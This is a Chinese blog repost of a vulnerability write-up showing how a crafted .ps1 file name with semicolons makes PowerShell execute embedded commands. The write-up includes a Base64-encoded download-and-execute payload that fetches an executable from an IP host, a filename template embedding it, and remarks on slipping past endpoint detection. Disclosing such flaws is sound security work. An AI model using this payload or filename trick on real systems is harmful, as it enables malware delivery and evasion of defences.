powershell目录带空格_精心构造的PS1文件名导致Powershell命令执行

最新推荐文章于 2023-03-16 14:07:31 发布
最新推荐文章于 2023-03-16 14:07:31 发布
阅读量268 收藏
点赞数
文章标签: powershell目录带空格
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39628256/article/details/112196459
版权
文章揭示了在Windows PowerShell中,如果PS1脚本文件名包含分号或空格,可能导致任意代码执行的安全隐患。通过特殊格式的文件名,攻击者可以执行exe、bat等文件,甚至在用户已将PowerShell设为默认打开.ps1程序时,只需双击文件即可触发。尽管需要用户交互,但这种利用方式可能绕过一些防护系统。
摘要由CSDN通过智能技术生成

Windows PowerShell是专门为系统管理员设计的Windows命令行外壳程序。PowerShell包括可独立使用或组合使用的交互式提示和脚本环境。

我们在一次测试中偶然发现,由于信任未过滤的文件名,因此在运行特殊命名的脚本时,PowerShell可能会执行任意代码。

测试发现当“ .ps1”文件包含分号“;”或者空格作为文件名一部分时,就会出现这种情况。

测试发现运行带有特殊格式文件名的脚本后,可以导致执行其他木马如exe文件,也可以是任何可执行文件如.com,.exe,.bat,.cpl,.js,.vbs和.wsf。

例如:使用”.\calc;1.ps1”则可以用来执行calc.exe,如果使用标准调用了该脚本Windows外壳程序“ cmd.exe”和“ calc.exe”与ps1脚本位于同一目录中。如下图所示:

28a45b148cd6e24b1fcb0185671c400b.png

但是,如果这些脚本是从PowerShells Shell运行的而不是“ cmd.exe”,则“&”(调用运算符)将阻止我们的漏洞利用。

不过,如果用户启用了“ .ps1”脚本以将PowerShell作为默认程序打开,则只需双击该文件即可触发漏洞利用。“&”呼叫运算符将不再起效果。另外,如果用户尚未启用PowerShell来打开.ps1脚本,

0fb38af846378eb59889535f1907c2ca.gif

默认情况下 然后从cmd.exe运行脚本,例如:

c:\>powershell "\Hello;World.ps1"

也可以直接运行,而无需放入PowerShell shell。

我的PoC测试下载一个远程可执行文件,将其保存到计算机中,然后执行它,而与PS文件本身的内容无关紧要。PS文件本身就是一个简单的:Write-Host “Hello World!”

另外,请注意,在vicitm调用“ iwr”(调用webrequest)之后,需要使用“%CD”来定位当前工作目录,缩写为空格,为了确保下载完成,需要睡眠2秒钟,然后执行。

测试过程如下:

1、生成powershell命令:首先,我们创建一个用于混淆的Base64编码的文件名;它将下载并执行一个在本例中名为“ calc.exe”的远程可执行文件。

将可执行文件托管在Web服务器上,或仅使用python -m SimpleHTTPServer 80或任何其他工具。

C:\>powershell [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell iwr 192.168.220.134/calc.exe -OutFile %CD%/calc.exe;sleep -s 2;start calc.exe'"))

2434208a63bd6b145c8677d8feb6a623.png

注意windows的文件名长度,尽量简写,如:

C:\>powershell [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell iwr 192.168.220.134/p %CD%/p.exe;sleep -s 2;start p.exe'"))

cABvAHcAZQByAHMAaABlAGwAbAAgAGkAdwByACAAMQA5ADIALgAxADYAOAAuADIAMgAwAAMQAzADQALwBwACAAYwA6AFwwBpAG4AZABvAHcAcwBcAGQAZQBiAHUAZwBcAFcASQBBAC8AcAAuAGUAeABlADsAcwBsAGUAZQBwACAALQBzACAAMgA7AHMAdABhAHIAdAAgAHAALgBlAHgAZQA=

这可能会破坏PowerShell的完整性,因为它可能允许意外的代码执行。即使脚本内容经过视觉检查也是如此。

我们也许还可以绕过某些端点保护或IDS系统,这些系统可能只查看文件的内容或标头,而不查看文件名。

为此,用户在打开“ .ps1”文件时必须已将PowerShell启用为其默认程序。

2、然后给PS脚本起一个普通的开始名称,然后使用“;”分隔命令。“ -e”是EncodedCommand的缩写,用于再次保存文件名空间。例如

test; powershell -e ; 2.ps1

3、双击以在PowerShell中打开,效果如下:

86d9131b4f2f3faa5bdc4e3b908d0c91.gif

或者在命令行下执行:

c6497cad4a1d7ec72d65d0ce15217fc1.png

以上示例是使用了“文件名嵌入式下载器”,其实我们还可以在同一目录中调用其他各种类型的第二特洛伊木马文件。

使用起来,是需要用户交互,需要想一个场景来利用。

显然运行任何随机PS脚本都是危险的……

但是,我们查看了文件内容,

a314c59320cbf7634ba64759048a9262.png

仅仅是打印了一个字符串,文件名理论上被查杀的可能性小。

*本文原创作者:freexploit,本文属于FreeBuf原创奖励计划,未经许可禁止转载

8abaf25f5823d27c6d813d77351016bc.gif

精彩推荐

b3214c26828d7b73135e8b46e0df9e64.png

0389605b319a848507f09cba18d12cd3.png

c5c5cef42454cb4e4e1ec5458109bbb8.png

4e88ebb61e3cbcf55221e357e74f57d2.png1cc11803a87554859277e8f0e0dde0e4.gif

weixin_39628256
关注
Powershell常用命令(一)
酒千殇的博客
04-16 2674
New-Object 功能:创建一个.net framework 实例或者一个COM 对象 实例: New-Object -TypeName System.Version -ArgumentList "1.2.3.4" #创建一个System.Version对象。 #-TypeNames 参数指明.NET Framework class的名字。 #-ArgumentList指明要传给.NET Framework class的构建器的的一组参数 $IE2 = New-Object -COMObject In
PowerShell
Claer_XX的博客
07-10 704
PowerShell 更多请见个人主页https://www.bajins.com 目录PowerShellflag包管理在batch中嵌入运行Windows10自应用命令事件计划任务系统环境变量 flag PowerShell命令叫做cmdlet(command-let), 采用了“动词-名词”的命名方式,动词部分取自于一个制定的动词集合, 名词部分则描述了命令要操作的对象。例如,Get-Command就是指获取PowerShell中所有cmdlet命令PowerShell提供对COM(组件
PowerShell命令中包含空格如何运行?
01-20
PowerShell中,可以直接运行命令。包括.exe结尾的、.com结尾的可执行程序,包括.bat结尾的、.cmd结尾的批处理程序,还有.vbs结尾的、.ps1结尾的脚本程序。均可以使用如下方式运行程序: <程序文件名>.<后缀> [参数列表] 但是请注意,这里的<程序文件名>其实是指的一个路径,可以是相对的,也可以是绝对的。当我们使用绝对路径的时候,会遇到路径中空格的情况,像上面那种去执行它,就会报错了。 那么,如何运行空格命令呢? 答案是用引号!双引号、单引号均可。比如C:\Program Files\Winrar\rar.exe,这个是Winrar自的一个命令行工具,可以用于
解决Powershell无法执行路径中包含空格的脚本文件
zhang197093的博客
03-16 3185
当然,如果当前已经处于powershell环境中,可以直接使用。这时可以借助powershell中的调用运算符。下面的示例展示了使用调用运算符和不使用的区别。
powershell目录空格_PowerShell命令中包含空格如何运行?
weixin_39626089的博客
12-19 1090
PowerShell中,可以直接运行命令。包括.exe结尾的、.com结尾的可执行程序,包括.bat结尾的、.cmd结尾的批处理程序,还有.vbs结尾的、.ps1结尾的脚本程序。均可以使用如下方式运行程序:. [参数列表]但是请注意,这里的其实是指的一个路径,可以是相对的,也可以是绝对的。当我们使用绝对路径的时候,会遇到路径中空格的情况,像上面那种去执行它,就会报错了。那么,如何运行空格的命...
powershell目录空格_Hybrid Script 附一则:解决 PowerShell 无法双击打开路径含空格文件的 Bug...
weixin_39658716的博客
12-19 852
该文介绍了混合式脚本的原理和示例,这里补充一个实际适用的场景。问题描述:在 Windows下,即使正确关联了 .ps1的打开方式,Powershell也无法正常运行脚本,只有一闪而过的报错信息。 正确设置了 PowerShell 的关联 使用录屏软件捕获到这一闪而过的错误信息而首先打开 PowerShell 终端,并在终端里指定执行脚本,则可以正确执行: 脚本本身没有问题错误原因:这个错误原...
powershell目录空格_powershell - 如何在命令行的路径中运行空格powershell脚本? - SO中文参考 - www.soinside.com...
weixin_36018419的博客
01-12 2976
-File Parameter如果要从命令行运行powershell.exe -File,则必须始终在doubleqoutes(")中设置空格的路径。单引号(')仅由powershell识别。但是,当命令行调用powershell.exe(因此处理文件参数)时,您必须使用"。powershell.exe -File "C:\Users\test\Documents\Test Space\test...
Powershell使用特殊文本命令
weixin_37189727的博客
03-13 671
# Powershell 定义文本 # 使用引号可以定义字符串,如果想让自己定义的字符串原样输出,可以使用单引号。 # $text='$fei $(tai) $env:windir 飞苔博客 (20+2012)' # $text # 定义的字符中的变量被内容替换,表达式被执行可以使用双引号 # $site="飞苔博客 Powershell博客" # $text="$site $(get-d...
Powershell基础
Love_Naive的博客
06-28 986
Powershell基础powershell介绍powershell打开方式powershell ISEpowershell的输入与输出powershell变量、常量与数组变量常量环境变量数组 powershell介绍 Windows Powershell是一种命令行外壳程序和脚本环境,是命令行用户和脚本编写者可以利用.NET Framework的强大功能 powershell是一个shell,定义好了一些命令操作系统,特别是与文件系统交互,能够启动应用程序甚至操纵应用程序。 powers能够使用star
powershell目录空格_空格Powershell打开文件路径
weixin_39942492的博客
12-19 599
Im my PS script I want to be able to run another script in another PS instance by doing the following:$filepath = Resolve-Path "destruct.ps1"start-process powershell.exe "$filepath"destruct.ps1 is in ...
Windows PowerShell 2.0 for xp下载
05-07
Microsoft Windows PowerShell 是一种新的命令行外壳和脚本语言,用于进行系统治理和自动化。Windows PowerShell 建立在 .NET Framework 的基础上,IT 专业人员可通过命令或脚本来治理计算机,从而通过系统自动化来提高工作效率。 Windows PowerShell 包括: * 129 个命令行工具(称为“cmdlet”),用于执行常见系统治理任务,如治理服务、进程、事件日志、证书、注册表以及使用 Windows Management Instrumentation (WMI)。 * 采用标准命名约定和通用参数的命令行工具,易于把握和使用;以及用于对数据和对象进行排序、筛选以及格式设置的简便工具。 * 对现有脚本语言、现有命令行工具以及多种 Windows 版本的支持,其中包括 Windows XP、Windows Server 2003、Windows Vista 以及 Windows Server(代码名称为“Longhorn”)。 * 方便的功能,使用户能够浏览数据存储(如注册表和证书存储),就像面对文件系统一样。 * 用于治理位于不同存储中以及采用不同格式的 Windows 数据的标准实用程序,这些数据包括 Active Directory (ADSI)、Windows Management Instrumentation (WMI)、组件对象模型 (COM) 对象、ActiveX 数据对象 (ADO)、HTML 和 XML。 * 在命令行进行的高级表达式分析和 .NET 对象处理,其中包括对对象进行流水线处理以帮助提高 IT 专业人员的工作效率。 * 可扩展的接口,使独立软件供给商和企业开发人员能够构建自定义 cmdlet 以满足特有的应用程序和系统治理要求。 安装本更新程序后,可能需要重新启动计算机。我们根据 Windows Vista 许可条款向您提供本更新程序并授予您使用许可。
Microsoft.PowerShell_profile.ps1
11-06
将脚本文件放入默认路径下 以管理员权限打开powershell 开始自动安装 powershell美化
PowerShell中文资料
10-10
PowerShell的中文资料: Windows PowerShell™ 指南 Windows PowerShell™ 入门 Windows PowerShell 语言快速参考
PowerShell 2.0 and WinRM 2.0 for Windows XP SP3
12-18
Windows Management Framework Release Candidate Windows PowerShell 2.0 and WinRM 2.0 Localized Package with Release Notes For x86 versions of Windows XP SP3.
修改shift+右键“在此出打开PowerShell窗口”为“在此出打开命令行窗口”
09-22
微软一直在推动的Windows PowerShell中的替代命令提示符,windows10 最新的版本,一个这样的变化是Windows PowerShellWin + X菜单中的默认条目,而不是命令提示符。此外,扩展右键菜单中的“打开命令窗口”也被“打开 PowerShell窗口”替换。虽然这是趋势,但对于普通程序员而言在实际使用过程中,还是原来的命令窗口比较顺手。 当然关于这点网上已经有一堆的修改教程,有靠谱的,有不靠谱的,为了方便操作,我写了一个批处理,能快速的切换shift+右键打开 PowerShell窗口或者cmd窗口,或者使二者共存。
powershell目录空格_Powershell无法读取文件名中的空格
weixin_39705193的博客
12-19 508
我试图通过TFS中的powershellscript运行sqlplus . 我有一个deployment.xml文件,其中包含sql脚本的部署顺序 . 我的PS脚本读取deployment.xml文件,然后执行sqlplus命令 . deployment.xml有3个文件新SQL FILE.sqlsample.sqldfg_ehl.sql名称中有空格的第一个文件没有被读取并且正在抛出错误:无法打...
CMD与PowerShell下,文件夹名有空格无法cd目录的解决办法
热门推荐
Imliao的博客
01-31 1万+
如图:
powershell目录空格_linux 在批处理中,完整路径有空格的处理方式(加引號)...
weixin_35607472的博客
01-12 114
cp -f E:/XML_EDITOR/xmleditor25/xmleditor/Editor_UIOuterCtrl/TraceViewDlg.cpp E:/XML_EDITOR/'XMLEditor windows server 2008'/xmleditor/Editor_UIOuterCtrl/TraceViewDlg.cppcp -f E:/XML_EDITOR/xmled...
命令行下进入空格的文件夹
卷卷的博客
05-29 1071
Linux 命令行下进入空格的文件夹 在空格的前面加 /
microsoft.powershell_profile.ps1
最新发布
09-03
对于需要在PowerShell每次启动时自动执行一系列命令和设置的用户,编辑microsoft.powershell_profile.ps1是个好方法。通过充分利用这个配置文件,用户可以根据自己的需求和使用习惯来个性化定制PowerShell,提高自己...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值